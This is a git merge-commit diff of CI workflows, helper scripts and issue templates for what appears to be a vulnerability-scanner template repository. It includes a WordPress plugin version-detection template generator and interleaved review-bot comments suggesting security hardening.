Merge branch 'main' into CVE-2017-5645
commit
c9db123f00
|
@ -13,7 +13,7 @@ labels: 'false-negative'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ labels: 'false-positive'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -0,0 +1,17 @@
|
|||
---
|
||||
name: Template Request
|
||||
about: 'request for new template to be created.'
|
||||
labels: 'new-template'
|
||||
|
||||
---
|
||||
|
||||
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||
|
||||
|
||||
### Template for?
|
||||
|
||||
<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
|
||||
|
||||
### Details:
|
||||
|
||||
<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->
|
|
@ -0,0 +1,30 @@
|
|||
# Set to true to add reviewers to pull requests
|
||||
addReviewers: true
|
||||
|
||||
# Set to true to add assignees to pull requests
|
||||
addAssignees: true
|
||||
|
||||
# A list of reviewers to be added to pull requests (GitHub user name)
|
||||
reviewers:
|
||||
- pussycat0x
|
||||
- DhiyaneshGeek
|
||||
- ritikchaddha
|
||||
|
||||
# A number of reviewers added to the pull request
|
||||
# Set 0 to add all the reviewers (default: 0)
|
||||
numberOfReviewers: 1
|
||||
|
||||
# A list of assignees, overrides reviewers if set
|
||||
assignees:
|
||||
- ritikchaddha
|
||||
- DhiyaneshGeek
|
||||
- pussycat0x
|
||||
|
||||
# A number of assignees to add to the pull request
|
||||
# Set to 0 to add all of the assignees.
|
||||
# Uses numberOfReviewers if unset.
|
||||
numberOfAssignees: 1
|
||||
|
||||
# A list of keywords to be skipped the process that add reviewers if pull requests include it
|
||||
# skipKeywords:
|
||||
# - wip
|
|
@ -0,0 +1,19 @@
|
|||
# To get started with Dependabot version updates, you'll need to specify which
|
||||
# package ecosystems to update and where the package manifests are located.
|
||||
# Please see the documentation for all configuration options:
|
||||
# https://help.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
|
||||
|
||||
version: 2
|
||||
updates:
|
||||
|
||||
# Maintain dependencies for GitHub Actions
|
||||
- package-ecosystem: "github-actions"
|
||||
directory: "/"
|
||||
schedule:
|
||||
interval: "weekly"
|
||||
target-branch: "main"
|
||||
commit-message:
|
||||
prefix: "chore"
|
||||
include: "scope"
|
||||
labels:
|
||||
- "Type: Maintenance"
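Review bot: Only the `github-actions` ecosystem is configured, so the exact pins this commit adds for the WordPress update script (`requests==2.28.1`, `urllib3==1.26.13`, `certifi==2022.9.24` and the rest) will not receive update PRs. Add a second `updates` entry with `package-ecosystem: "pip"` and `directory: "/.github/scripts"` on the same weekly schedule, and confirm Dependabot recognises the non-standard file name `wordpress-plugins-update-requirements.txt`. Installing with pip's `--require-hashes` would additionally verify the artefacts pulled by the daily job.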
|
|
@ -0,0 +1,10 @@
|
|||
beautifulsoup4==4.11.1
|
||||
bs4==0.0.1
|
||||
certifi==2022.9.24
|
||||
charset-normalizer==2.1.1
|
||||
idna==3.4
|
||||
Markdown==3.4.1
|
||||
requests==2.28.1
|
||||
soupsieve==2.3.2.post1
|
||||
termcolor==2.1.1
|
||||
urllib3==1.26.13
|
|
@ -0,0 +1,185 @@
|
|||
#!/usr/bin/env python3
|
||||
|
||||
'''
|
||||
This script reads the URL https://wordpress.org/plugins/browse/popular/ until page 10, extract each plugin name and namespace,
|
||||
then in http://plugins.svn.wordpress.org/ website, looks for the "Stable tag" inside the readme.txt and extract the last version
|
||||
number from trunk branch. Finally generates a template and a payload file with last version number to be used during scan that
|
||||
compares the detect version with the payload version.
|
||||
|
||||
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||
|
||||
e.g.
|
||||
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
'''
|
||||
|
||||
__author__ = "ricardomaia"
|
||||
|
||||
from time import sleep
|
||||
from bs4 import BeautifulSoup
|
||||
import requests
|
||||
import re
|
||||
from markdown import markdown
|
||||
import os
|
||||
from termcolor import colored, cprint
|
||||
|
||||
# Regex to extract the name of th plugin from the URL
|
||||
regex = r"https://wordpress.org/plugins/(\w.+)/"
|
||||
|
||||
ranking = 1
|
||||
|
||||
# Top 200 Wordpress Plugins
|
||||
for page_number in range(1, 11):
|
||||
|
||||
html = requests.get(url=f"https://wordpress.org/plugins/browse/popular/page/{page_number}", headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Connection": "keep-alive",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Cache-Control": "max-age=0",
|
||||
"Pragma": "no-cache",
|
||||
}).content
|
||||
|
||||
# Parse HTML
|
||||
soup = BeautifulSoup(html, 'html.parser')
|
||||
results = soup.find(id="main")
|
||||
articles = results.find_all("article", class_="plugin-card")
|
||||
|
||||
# Setting the top tag
|
||||
top_tag = "top-100,top-200" if page_number <= 5 else "top-200"
|
||||
|
||||
# Get each plugin in the page
|
||||
for article in articles:
|
||||
|
||||
full_title = article.find("h3", class_="entry-title").get_text()
|
||||
regex_remove_quotes = r"[\"`:]"
|
||||
subst_remove_quotes = "'"
|
||||
title = re.sub(regex_remove_quotes, subst_remove_quotes, full_title)
|
||||
|
||||
link = article.find("a").get("href")
|
||||
name = re.search(regex, link).group(1)
|
||||
|
||||
cprint(f"Title: {title}", "cyan")
|
||||
cprint(f"Link: {link}", "yellow")
|
||||
cprint(f"Name: {name} - Ranking: {ranking}", "green")
|
||||
print(f"Page Number: {page_number}")
|
||||
print(f"Top Tag: {top_tag}")
|
||||
print(f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt")
|
||||
ranking += 1
|
||||
|
||||
sleep(0.2)
|
||||
|
||||
# Get the readme.txt file from SVN
|
||||
readme = requests.get(
|
||||
url=f"http://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
|
||||
headers={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6",
|
||||
"Cache-Control": "no-cache",
|
||||
"Connection": "keep-alive",
|
||||
"Host": "plugins.svn.wordpress.org",
|
||||
"Pragma": "no-cache",
|
||||
"Upgrade-Insecure-Requests": "1",
|
||||
"Referer": "http://plugins.svn.wordpress.org/{name}/trunk/"}).content
|
||||
|
||||
# Extract the plugin version
|
||||
try:
|
||||
version = re.search(r"(?i)Stable.tag:\s+([\w.]+)",
|
||||
readme.decode("utf-8")).group(1)
|
||||
except:
|
||||
version = "N/A"
|
||||
|
||||
# Extract the plugin description
|
||||
try:
|
||||
description_markdown = re.search(
|
||||
r"(?i)==.Description.==\W+\n?(.*)", readme.decode("utf-8")).group(1)
|
||||
html = markdown(description_markdown)
|
||||
full_description = BeautifulSoup(html, 'html.parser').get_text()
|
||||
regex_max_length = r"(\b.{80}\b)"
|
||||
subst_max_lenght = "\\g<1>\\n "
|
||||
description = re.sub(
|
||||
regex_max_length, subst_max_lenght, full_description, 0, re.MULTILINE)
|
||||
except:
|
||||
description = "N/A"
|
||||
|
||||
print(f"Version: {version}")
|
||||
print(f"Description: {description}")
|
||||
|
||||
# Write the plugin template to file
|
||||
template = f'''id: wordpress-{name}
|
||||
|
||||
info:
|
||||
name: {title} Detection
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://wordpress.org/plugins/{name}/
|
||||
metadata:
|
||||
plugin_namespace: {name}
|
||||
wpscan: https://wpscan.com/plugin/{name}
|
||||
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
|
||||
|
||||
payloads:
|
||||
last_version: helpers/wordpress/plugins/{name}.txt
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
internal: true
|
||||
name: internal_detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
name: detected_version
|
||||
group: 1
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
name: "outdated_version"
|
||||
dsl:
|
||||
- compare_versions(internal_detected_version, concat("< ", last_version))
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||
'''
|
||||
|
||||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
||||
if not os.path.exists(template_dir):
|
||||
os.makedirs(template_dir)
|
||||
|
||||
helper_path = f"helpers/wordpress/plugins/{name}.txt"
|
||||
version_file = open(helper_path, "w")
|
||||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
||||
print("--------------------------------------------")
|
||||
print("\n")
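Review bot: `name` is taken from a scraped `href` with the greedy pattern `(\w.+)` and then used unvalidated in `helpers/wordpress/plugins/{name}.txt`, the template path and the generated YAML, so an unexpected link (extra slashes, `..`, YAML metacharacters) could write outside the intended directories or produce a malformed template that the scheduled job commits. Restrict it to a slug pattern and skip anything else; the same spot should handle `re.search` returning `None`. The readme is also fetched over plain `http://` with no `timeout`, although its `Stable tag` value becomes the committed payload; use `https://` and a timeout. Separately, the `Referer` header string is missing its `f` prefix, so `{name}` is sent literally, and the two bare `except:` clauses would be clearer as `except (AttributeError, UnicodeDecodeError):`.

```python
# Plugin slugs only; anything else found in the scraped href is skipped.
SLUG_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*")

# … unchanged: page loop, HTML parsing, title clean-up …
        link = article.find("a").get("href")
        match = re.search(regex, link or "")
        if match is None or not SLUG_RE.fullmatch(match.group(1)):
            cprint(f"Skipping unexpected plugin link: {link!r}", "red")
            continue
        name = match.group(1)

# … unchanged: progress output, sleep …
        readme = requests.get(
            url=f"https://plugins.svn.wordpress.org/{name}/trunk/readme.txt",
            timeout=30,
            # … unchanged: headers, with the Referer value written as an f-string …
        ).content
```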
|
|
@ -0,0 +1,93 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
type Classification struct {
|
||||
CVSSScore string `yaml:"cvss-score,omitempty"`
|
||||
}
|
||||
|
||||
type Info struct {
|
||||
Name string `yaml:"name"`
|
||||
Severity string `yaml:"severity"`
|
||||
Description string `yaml:"description"`
|
||||
Classification Classification `yaml:"classification,omitempty"`
|
||||
}
|
||||
|
||||
type Data struct {
|
||||
ID string `yaml:"id"`
|
||||
Info Info `yaml:"info"`
|
||||
FilePath string `json:"file_path"`
|
||||
}
|
||||
|
||||
func main() {
|
||||
if len(os.Args) != 3 {
|
||||
fmt.Println("Usage: go run main.go <directory> <output_file>")
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
directory := os.Args[1]
|
||||
outputFile := os.Args[2]
|
||||
|
||||
var data []Data
|
||||
|
||||
err := filepath.Walk(directory, func(path string, info os.FileInfo, err error) error {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
yamlFile, err := ioutil.ReadFile(path)
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
|
||||
var d Data
|
||||
err = yaml.Unmarshal(yamlFile, &d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error unmarshalling YAML file %s: %v\n", path, err)
|
||||
return err
|
||||
}
|
||||
if d.Info.Classification.CVSSScore == "" {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
if d.Info.Classification == (Classification{}) {
|
||||
d.Info.Classification.CVSSScore = "N/A"
|
||||
}
|
||||
fpath := strings.Replace(path, "/home/runner/work/nuclei-templates/nuclei-templates/", "", 1)
|
||||
d.FilePath = fpath
|
||||
|
||||
data = append(data, d)
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
fmt.Printf("Error reading directory: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
var jsonData []byte
|
||||
for _, d := range data {
|
||||
temp, err := json.Marshal(d)
|
||||
if err != nil {
|
||||
fmt.Printf("Error marshalling JSON: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
jsonData = append(jsonData, temp...)
|
||||
jsonData = append(jsonData, byte('\n'))
|
||||
}
|
||||
err = ioutil.WriteFile(outputFile, jsonData, 0644)
|
||||
if err != nil {
|
||||
fmt.Printf("Error writing JSON data to file: %v\n", err)
|
||||
os.Exit(1)
|
||||
}
|
||||
|
||||
fmt.Println("JSON data written to", outputFile)
|
||||
}
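Review bot: The `strings.Replace` call that strips `/home/runner/work/nuclei-templates/nuclei-templates/` only works on a GitHub-hosted runner with that exact checkout path; in a renamed fork or a local run `file_path` keeps the absolute path and carries it into `cves.json`. Deriving it with `filepath.Rel` against the working directory (`cwd, _ := os.Getwd()` once, then `fpath, err := filepath.Rel(cwd, path)`) keeps the output stable. Apart from `FilePath`, the struct fields carry only `yaml` tags, so the JSON keys come out as Go field names (`ID`, `Info`, `CVSSScore`) next to `file_path`; add `json` tags if lowercase keys are intended. The second `Classification{}` comparison can never be true once the line above has set `CVSSScore`, and the walk callback never checks its incoming `err`.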
|
||||
|
|
@ -0,0 +1,22 @@
|
|||
name: 🗑️ Cache Purge
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
deploy:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
# Wait for 5 minutes
|
||||
- name: Wait for 2 minutes
|
||||
run: sleep 120
|
||||
|
||||
- name: Purge cache
|
||||
uses: jakejarvis/cloudflare-purge-action@master
|
||||
env:
|
||||
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
|
||||
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
|
||||
# PURGE_URLS: '["https://version-check.nuclei.sh/versions"]'
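Review bot: `jakejarvis/cloudflare-purge-action@master` is a third-party action referenced by a mutable branch and it receives `CLOUDFLARE_TOKEN`, so whatever that branch points to at run time executes with the secret. Pin it to a reviewed full commit SHA, e.g. `uses: jakejarvis/cloudflare-purge-action@<full-commit-sha>`, and let Dependabot propose the bumps. The same applies to `ad-m/github-push-action@master` and `actions/checkout@master` in the other workflows touched by this commit, which run with a token that can push to the repository. The `# Wait for 5 minutes` comment also disagrees with the step, which sleeps 120 seconds.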
|
|
@ -3,43 +3,43 @@ name: ✍🏻 CVE Annotate
|
|||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
- main
|
||||
paths:
|
||||
- '**/cves/**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.19
|
||||
|
||||
- name: cve-annotate install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@latest
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
run: |
|
||||
if ! which cve-annotate > /dev/null; then
|
||||
echo -e "Command cve-annotate not found! Installing\c"
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
|
||||
fi
|
||||
cve-annotate -i ./cves/ -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
cve-annotate -i . -d .
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add cves
|
||||
git add .
|
||||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
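Review bot: The install step builds `cve-annotate` from `@latest` (with an `@dev` fallback in the following step), so an unreviewed upstream build rewrites templates and the result is committed and pushed automatically. Pin the tool to a release tag, e.g. `go install -v github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@<release-tag>`; the `generate-checksum@dev` and `nuclei@latest` installs in the checksum and validate workflows have the same property. Assuming `git add .` is the new side of the duplicated line, the commit step now stages everything in the workspace rather than the template directories, so limit it to the paths `cve-annotate` is expected to touch. The job also declares no `permissions:` block; `contents: write` is all the push needs.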
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
name: Generate JSON Metadata of CVE Templates
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**/cves/'
|
||||
workflow_dispatch: # allows manual triggering of the workflow
|
||||
|
||||
jobs:
|
||||
cve2json:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
check-latest: true
|
||||
|
||||
- name: Run yaml2json.go to generate cves.json
|
||||
run: |
|
||||
go env -w GO111MODULE=off
|
||||
go get gopkg.in/yaml.v3
|
||||
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json
|
||||
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add cves.json cves.json-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated cves.json [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
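Review bot: `go env -w GO111MODULE=off` followed by `go get gopkg.in/yaml.v3` fetches whatever the dependency's default branch holds, without `go.sum` verification, and the generated `cves.json` is then pushed back to the repository. Keeping a small `go.mod`/`go.sum` next to `yaml2json.go` and running in module mode pins and verifies it. The path filter `'**/cves/'` has no file wildcard and probably never matches a changed template; `'**/cves/**'` looks like the intent. The commit step is unconditional, so `git commit` exits non-zero and fails the job when nothing changed; guard it with a change count as the other workflows do.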
|
|
@ -0,0 +1,39 @@
|
|||
name: 🥳 New Template List
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
templates:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Generate new template list
|
||||
id: new-additions
|
||||
run: |
|
||||
git pull
|
||||
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add .new-additions -f
|
||||
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
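Review bot: `$(git tag | tail -n 1)` picks the last tag in lexical order, which is not necessarily the newest release (for example, a constructed pair such as `v9.9.0` and `v9.10.0` sorts the older one last), so `.new-additions` can be diffed against the wrong baseline. Use version ordering instead: `git tag --sort=-v:refname | head -n 1`. In the same pipeline `grep .yaml` treats the dot as a wildcard and is unanchored; `grep '\.yaml$'` matches only template files.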
|
|
@ -22,7 +22,7 @@ jobs:
|
|||
fetch-depth: 0
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
uses: actions/setup-python@v4
|
||||
with:
|
||||
python-version: "3.8"
|
||||
|
||||
|
@ -30,17 +30,17 @@ jobs:
|
|||
id: readme-update
|
||||
run: |
|
||||
python .github/scripts/update-readme.py
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -1,6 +1,10 @@
|
|||
name: ❄️ YAML Lint
|
||||
|
||||
on: [push, pull_request]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
|
@ -8,7 +12,7 @@ jobs:
|
|||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Yamllint
|
||||
uses: karancode/yamllint-github-action@master
|
||||
uses: karancode/yamllint-github-action@v2.1.1
|
||||
with:
|
||||
yamllint_config_filepath: .yamllint
|
||||
yamllint_strict: false
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch: # allows manual triggering of the workflow
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
id: checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.checksum.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
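Review bot: The `Push changes` step has no `if: steps.checksum.outputs.CHANGES > 0` guard although the commit step does, so the push action runs on every trigger; add the same condition. `generate-checksum` is given the hard-coded `/home/runner/work/nuclei-templates/nuclei-templates/`, where `$GITHUB_WORKSPACE/` is the portable form. The checkout here also omits `persist-credentials: false`, unlike the other workflows that push with the same action; make them consistent.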
|
|
@ -0,0 +1,32 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
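Review bot: The `insteadOf https://github` rewrite matches any URL that merely starts with `https://github`, so `ACCESS_TOKEN` would be attached to requests for hosts other than `github.com` if the clone or `go install` ever resolves one. Scope it to the exact origin, `git config --global url."https://${ACCESS_TOKEN}@github.com/".insteadOf "https://github.com/"`, and pass the secret through `env: ACCESS_TOKEN: ${{ secrets.ACCESS_TOKEN }}` rather than interpolating it into the script text. The token also stays in the global git config for the `Generate Index` step; unset it once the install finishes.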
|
|
@ -1,37 +1,29 @@
|
|||
name: 🛠 Template Validate
|
||||
|
||||
on: [ push, pull_request ]
|
||||
on:
|
||||
pull_request:
|
||||
paths:
|
||||
- '**.yaml'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
|
||||
- name: Get latest Nuclei release version
|
||||
id: nuclei-latest
|
||||
uses: actions/github-script@v5
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
result-encoding: string
|
||||
script: |
|
||||
const release = await github.rest.repos.getLatestRelease({
|
||||
owner: 'projectdiscovery',
|
||||
repo: 'nuclei',
|
||||
});
|
||||
fetch-depth: 0
|
||||
|
||||
return release.data.name
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.nuclei-latest.outputs.result != ''
|
||||
env:
|
||||
VERSION: ${{ steps.nuclei-latest.outputs.result }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
- name: nuclei install
|
||||
run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
cp -r ${{ github.workspace }} $HOME
|
||||
nuclei -validate -t .
|
||||
nuclei -validate -w ./workflows
|
||||
nuclei -duc -validate
|
||||
nuclei -duc -validate -w ./workflows
|
|
@ -10,10 +10,14 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/checkout@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v4
|
||||
with:
|
||||
go-version: 1.19
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -37,10 +41,10 @@ jobs:
|
|||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
if: steps.stats.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
